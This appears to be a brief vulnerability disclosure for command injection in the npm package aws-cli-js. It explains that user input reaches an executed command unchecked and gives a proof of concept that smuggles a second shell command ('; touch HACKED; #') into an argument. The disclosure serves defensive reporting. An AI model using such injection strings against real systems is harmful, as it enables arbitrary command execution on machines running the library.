Command Injection in quobject/aws-cli-js
Mar 27th 2020
The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here.
Proof of Concept (Credit: Mik317)
- Create the following PoC file:
// poc.js var awsCli = require("aws-cli-js"); var Options = awsCli.Options; var Aws = awsCli.Aws; var options = new Options("your key", "your key2", "your token", null); var aws = new Aws(options); aws.command("test; touch HACKED; #");
- Check there aren't any files called
- Execute the following commands in another terminal:
npm i aws-cli-js # Install affected module node poc.js # Run the PoC
- Recheck the files: now
HACKEDhas been created.
to join this conversation